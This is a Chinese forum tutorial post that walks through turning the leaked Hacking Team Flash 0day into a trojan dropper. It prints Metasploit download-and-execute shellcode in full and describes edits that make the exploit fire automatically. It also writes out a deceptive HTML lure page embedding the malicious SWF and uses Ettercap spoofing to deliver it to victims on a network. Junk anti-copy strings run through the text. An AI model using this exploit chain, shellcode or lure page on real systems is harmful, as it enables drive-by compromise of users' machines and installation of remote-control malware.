|
5 P3 C$ D* {* s& C* x+ f" T/ j 三、flash 0day之手工代码修改制作下载者实例入侵演示 ) h5 E8 R5 e9 c6 T3 T/ P y4 {4 K. H3 f
" _" d1 Z% ?2 r) O4 A5 h8 E/ O+ k
/ m2 p- q( C* F 利用到的工具:
+ [! D+ J8 Y6 b+ b
q6 u* G. Y4 l) X' ^. S3 j; i+ o0 Z( x! J) X" _
Msf ( g) X/ \ e8 n$ x( G
) b5 v/ P6 Q% M* x
8 C& U+ ?* M$ m# u7 F. Z, x Ettercap
0 G z0 w% v7 Q4 {8 ^, y( u: R3 g - F# A. ^/ t4 i! C
e* L5 Z! ?) L- p; o; d
Adobe Flash CS6
% I8 [0 x" j5 m ; m# [% H( U1 z
3 n& J0 X6 v, p6 G Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " ]6 `; M8 S1 j- O4 f8 f
$ U0 ^( f2 }6 _
/ D2 ^3 h; Q, [2 @5 E3 E2 v) K5 i. J 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 6 k9 V* ~' Z+ s% l5 @; W0 t! S9 f
5 c, u' F7 Y& T% D2 a5 Y8 y% b+ e: ]* q
如图:
! S6 h: S% l$ f! }) h+ W9 f# j
" g$ ^$ n/ b: b8 B' R- {+ `' x! j+ R" q
/ x) D: {5 n7 r0 ]6 k9 ]! D
( K! X8 n* G8 I; ^
) \3 }' W* y& [4 C& I6 p 
! E5 \# e. u/ N
7 y0 f- F9 f4 Y! R& g! c1 v! C1 o. n! t! P* U5 D9 K4 W d
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
; n9 W5 i/ c( s$ x. ~* M" g 2 I" Q, x3 {& m) N1 c
- |+ [! Z6 c# O! P- S+ E5 R" b
1 g) B0 q4 T! h, Q6 Y" Z& x
! C- X2 w, q" A( H6 v& [( h$ Y( F' G2 j
! I& u& A, S$ Z3 G5 A2 L2 v
. y7 }) M* _( ^5 @7 v
P1 L5 C- r0 R; v. L/ ?( d 然后执行generate -t dword生成shellcode,如下: 0 ]8 V+ z% o. h# A6 Q5 M
, F. V7 j( p# T7 }" g4 x0 a) N8 \) ]- v) \
 - |: U3 i6 H' g' b3 z1 Y
8 A: k$ F% u: D/ K, Y
+ M3 m6 [5 e- k2 h4 y 复制代码到文本下便于我们一会编辑flash exp,如下:
0 x! `$ U% z' X+ `$ _9 X
& H: W, G6 t9 D6 c, _0 I
( n7 R% I3 n' p$ `, D0 P 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
* x3 H; P" h1 G! o" @& b 7 H7 Z; |+ F/ C) r. K8 k7 @$ I
* h0 F7 E8 i* v- p* z5 M& C0 J- m 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
- d7 q6 v$ A: p3 t- W. m9 [
& [/ Z" S# ~! H5 Z: ?5 x6 [4 X, O+ Y; c9 K
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
3 p5 P/ [+ x$ n2 n, V( b( Z + s8 ~7 P: `# [8 l& s8 M+ q, [
2 v# I; E7 R D! s Y! w: i
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
# b. f. h6 y2 J, t' ~- z, B
1 V) q' ~( r8 s' H6 d M2 z6 |* d5 C$ C
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / G' c- k1 @, Z+ G; n% _. F
?9 }, ?% a% k" D1 ]3 K% I
( M1 V! w4 F% u+ L- ^
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
4 y) G0 q. D4 c z: {- b
! y/ z) x5 ^' p
' \. b$ f( }- a1 ^ 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
; F; ^7 U3 m0 ]$ H
t$ O) C' V2 c4 n: q# W- _) D3 `; |5 M, Q D3 [* o
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
1 @3 {4 K3 J @) ]/ d/ k
% S! f, Q" K" L3 D7 V M8 a, J3 G: w9 z
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 g# i# `- C# h: ~
# K y1 S! r8 `1 m
/ m0 X( ]* c; w" c7 w 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 2 s5 o' z1 N- y4 {+ ]! D3 z: M! v5 T
" k& }* n9 s* u4 m- A) b9 Y* }4 l# K4 J& T, [' M% q, ~
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % X) s4 i4 o& h3 [) P6 x& _
2 f7 m( p) t; i/ V( N& K- r; r# |: i* T' v
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
* D8 |) _' m4 m! ]* ]+ J ' Q; @/ C/ A0 ~$ D# }9 A/ e
. J1 l# j! K# O# W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 5 V! g* j+ z' ?4 @# P# ~
- P) c5 r8 M4 s9 _6 N* \5 b3 }8 n
, A5 Q2 A% B9 h
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 6 J+ Z; G9 r! |. R$ O6 h
% ~) y, @5 g5 K
. S- ?2 M* K+ _ % [( \- s/ l h. P$ Z) s8 \* ^
1 J a) Q0 u8 W7 y* h+ h
4 }( H( k! R7 X2 J V- N7 ? ) {: J0 j7 N5 }( \7 q2 U6 e
, I3 v4 ~. k+ z, b Y9 a2 `7 y7 D6 b. _" `! f/ U. S, J7 Y4 ]! w, w% w+ A
下面我们来修改flash 0day exp,需要修改三个文件,分别为: : E8 {1 i! Q; S
9 O! I1 d9 P5 ?" `
8 c' d( E* ^" G+ \ 
7 X& U! J& S+ j
7 A5 L/ A4 O( A! ]& G8 q
9 n: n7 R/ c+ M4 D 先修改ShellWin32.as,部分源代码如图: 8 M) W3 o7 D( _/ b: ?3 \/ ^# w
7 e" e( d( M4 y8 W6 x
$ ?9 g' m) b1 d7 u' W( n: n  . s1 ^" A y. T7 W$ [' j
( ]6 Q; W) M" [2 H5 v7 p& Y3 p6 ~+ O" K6 q3 A- |$ A
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
. \" ^& I- S. j* k" |5 H" O8 m 9 W1 b+ \3 A: V: |/ f7 t* e V; k
6 x2 D2 I0 B/ ~ w3 I% j6 ~
 4 O3 N! z/ h. r X1 o/ M* Y' ^( c
# Z1 W1 p2 o5 ~, i' Y
/ ~. C* I- L' ~7 c' f
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
- w& |7 y# {9 e) p; l. j 5 C& h1 j p9 A: M
$ ?/ t1 h' n2 U5 b+ e+ w4 {
 : ]" M* @: Z( G/ o0 m6 i
/ V( J1 V" q x, \
% D" v+ D' _2 h9 k% a3 c' s" X
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
8 Q* O$ o, l& F# J $ D- A9 }6 k; p# ~" R
8 h ]. F% i1 ?: _# }7 S- y
( r% Z; \, d; z" J6 W
& g0 ^0 ]4 n& l8 D8 E
; d, ]/ t% q" H/ Y2 J" a: I K3 D
! e& b+ T W! v' v1 C
D' E" e! ^+ _6 T; _7 @& x7 R" h
0 v1 `) ?+ S ~" N3 f" X! n% B! X7 x2 h 
; Q7 K( v% ?: A; x" {1 F+ L5 E' [2 m 3 h! M- D- J# R5 ]8 r
, A U1 _9 M, Z: l' ]
然后点保存,下面我们来编译一下,打开
+ a# V! W' o4 N$ v; R
' g; h4 M+ e9 E, S5 }- y% N
* r" V5 t2 f4 G0 v exp1.fla然后点文件-发布,看看编译没错误 J: |/ z; {, P. v) d
6 N3 l ?0 m4 ]5 P4 q2 V; z. e' a( i8 F
; `7 ?5 S* s/ K! K
! S, c& w% z0 j% a
6 D$ _9 w7 e/ Z+ s ; n) B/ j8 t' m E# u! y( u9 \
/ m c* S* O5 G4 x0 B& @
4 s" K6 X: A; Q% E & d- Y$ \( ?1 O
1 `' ]4 ]2 X- t( F) c
- Q; \0 I: D3 G& u 
. t: `+ W! Y1 N5 e* J1 j
' A$ _6 A2 K% n
4 B$ k5 Q; V5 t; e$ x 然后我们把生成的 ; P" W: N1 K. P2 z. ^! [% O
R# @0 F2 S7 R& [( g% \1 Z8 ^: f
$ r# G' n1 t+ X! o5 y9 l2 T
exp1.swf丢到kailinux 的/var/www/html下: $ ?/ f! ?& ?* P
# _" J, I3 I+ V' O+ a4 f$ i$ {
* d! |' J; `: \% ], _+ D3 ^, v
然后把这段代码好好编辑一下
9 `# |% o6 W/ M& q: _* H + b1 ~# {+ @: C6 g- X" D
5 v* T( I: q; t7 n+ t- j4 u' Z
4 l+ @) P* ^( M& ]% \3 [3 ~
* \2 C1 ~% H7 v# O
- [! U4 t% L H/ P
2 T/ C9 t! C! V$ l " b! d( T- p( `; Y$ q8 h
/ O; p1 }3 Z4 R5 S* R
# l2 t5 l6 ~0 P' e+ d2 {! ~# f$ ^ : O0 a: E# Z; d- ^5 X/ _
, M; R- ]1 H: t! \ 8 F# j0 W7 V5 s1 ?- C8 t8 h
) o# J! C& Q$ c3 m" E; X
, [6 c2 \" j5 a; C+ s- T
) h# X: |/ N( M9 M
& k$ {9 E# E9 [# P" K- T+ X, a: V
/ ~" {* O: ?! }. t1 [. K5 `5 }% K9 {
& m, W2 M2 ^9 U4 S; q
4 R( O1 Z: i0 {1 T) x ]" T7 J% k; k) E$ }! a+ d
<!DOCTYPE html> : u. {8 ~3 J% F _9 W
C7 S; |0 P0 M& z
+ i( L: M- i* P0 m7 ]6 Y5 S <html>
; i$ R) g6 |3 T% M. z/ x" U
H3 r" u/ I: B1 O+ ~+ v* H6 `7 D, B; Z, ?2 u
<head>
$ @% \& E5 x I, n! X+ f o) t+ A: H, b! r ?( ~1 P7 Z/ a$ C
- O6 L! \4 G1 L' i! e/ R
<meta http-equiv="Content-Type" content="text/html; % W+ _' |9 B6 V" c9 h7 m3 u5 E Y: M5 |
9 j$ K: {4 ?" m t* }! Q
4 A5 @, B3 \7 {
charset=utf-8"/> ( I* \9 ?$ h5 S
# A; a; D* v7 M% ~0 e6 C
0 ]8 A4 i: x9 z6 Z. G M4 K </head> & e7 D: A: ?8 B) O' F
* R: t/ l. O& i, x
( u, C0 x! S( H- Q7 M! l4 W$ A4 s <body>
2 N) F4 B. O' H J
: D5 H2 x, p, k' P8 b$ r
& z# b3 q+ `7 V/ z) N <h2> Please wait, the requested page is loading...</h2>
2 }4 H/ G5 G, J( T3 p4 J& _) H) ~8 s
a3 f! h! ^- K3 {: r
5 N, k; f) P2 c- O3 c2 N <br>
/ M8 `/ t% J* y8 K7 ] , V7 q' G$ |4 ], K: b/ q& R7 v
. T$ Y" O* ^8 N3 Z1 b0 `4 Q3 O <OBJECT # P+ s: S' a4 S. X3 S
4 H+ Z- ?! Z. a/ t3 R) c0 }. J' P( ~- f1 o( G
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie g+ A* a Z, q, q1 ?& M
' P; _- e6 v2 w& s
2 A q8 W1 Z: B* i% X( M$ P5 y! [
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> / `8 Z2 O1 k* r8 ]: G
+ f% D( S$ `6 c; e! u6 Z4 \
% q% L: v% H, F) C </body>
2 h5 h$ i, {2 @ L) D
' m' O6 u. v- l( {; W1 A, M; }$ h$ _ R1 R! ]
<script>
1 @' J# D2 S8 }6 G& U
6 Y5 w& I& W6 F. b/ O1 M2 Y! v
; | Z1 F+ u% e$ T. l7 Z setTimeout(function () { ( T2 z' \& {* U4 n
) V7 q# e2 _8 I) |
; \# H, u" s$ s9 T! e
7 m. X& S. p& N! O0 w ' ?$ E$ `/ _/ H6 `3 ^+ R/ \$ O" o
2 o( C6 @ x3 A( b5 z
window.location.reload(); 8 u' p! F+ N; y. [8 W
' d, s* u% U" L2 c& F
* R$ O5 C8 e& m- w7 ]" q" k' j }, 10000); , Y# C1 u5 }: J! N9 b
& W9 s: z" H* X6 q, |
# A, n* W* S( O5 Q- c, q
& Q# P* d3 }" n- o - X3 V6 q9 J; m" U, o! S
: G+ @4 B; ]' |& D </script> ' J# k+ y2 e+ p4 S& k7 I) @" A
) l* K5 J8 I# C# ^, B7 S: T" G
/ A/ S* w! W8 B; f: i1 z; c _
</html> 3 _" C* z) B8 f, q# N$ |2 D
- ]- ?5 V- p* o3 W" I# i9 R/ e1 a& [
2 j7 B7 b/ ?+ ]
! _1 h, M( b e' k
6 v7 H, ?+ C& O7 C
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
( Z, ~4 s3 T! r8 f4 ? # J3 S6 }2 g/ Z9 x4 U
' L& w% L! w" J: d: T" E- T# }: [
 ' p M9 ]( h9 g9 x( ]1 W. V0 Z
S0 k: ^7 I9 d; `
5 P, H6 \2 S1 V$ O
; |8 K& |3 C/ [ & d. Y+ M: `& H# D. r) j6 |# |$ g; |/ ?
: d& J* Q u: x2 f5 x
8 d- p' y' }- {: T9 \! ~ : ^# P2 g4 z) B1 @4 |+ e
: g+ g) r, X/ F$ O0 j & t. t9 o4 @8 O' |- w& B5 Q
0 ]) m* D2 B! F/ J: c8 ^4 D: S
9 c2 l$ t8 L f5 K, l% k1 j( ~
2 J- Q2 E4 U* B i
* k2 b4 j8 H5 Q8 Y1 K' T. A& s" f: Q- X4 W' t( B
下面我们用ettercap欺骗如图: - W) T$ `2 P# H& ?5 s8 y
Z7 o3 ^/ Z/ |) B" Z3 p7 w g w8 u9 u3 G( p( j
 6 G: M( d$ l/ i/ r. I
2 {9 b* n+ F3 g
4 p* @1 n9 E& h, V% b# a , F4 W9 Y2 v1 U2 u( Y' |
]6 M/ }5 j3 v
- d, Z, I& _4 O4 n 下面我们随便访问个网站看看: 8 Y4 R- {- }( q' l: K
7 {# \! U) Q3 f) r7 _% ^' y
0 P8 d( V. i/ A T; d2 ?8 U) ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 0 |3 P* n$ n6 j4 Y5 [0 O. r- c
4 b O8 F# u% y4 f) w5 Y
9 O6 u+ C$ W' [2 B. ~' W* b, R9 |" \
 " ^ K8 o, O: s7 f. j5 N/ R; b
) @- A! [( o$ E+ {
. C" i; D, ?6 I& y9 E9 x. a8 Y$ o
我们看另一台, , t" I1 u6 a! |* l! w' e( D+ v
1 H m' Z( `! A; n8 w' u6 H& G @7 ?! L! _% b$ y
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 - l2 {& b! |5 S- u2 ?
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对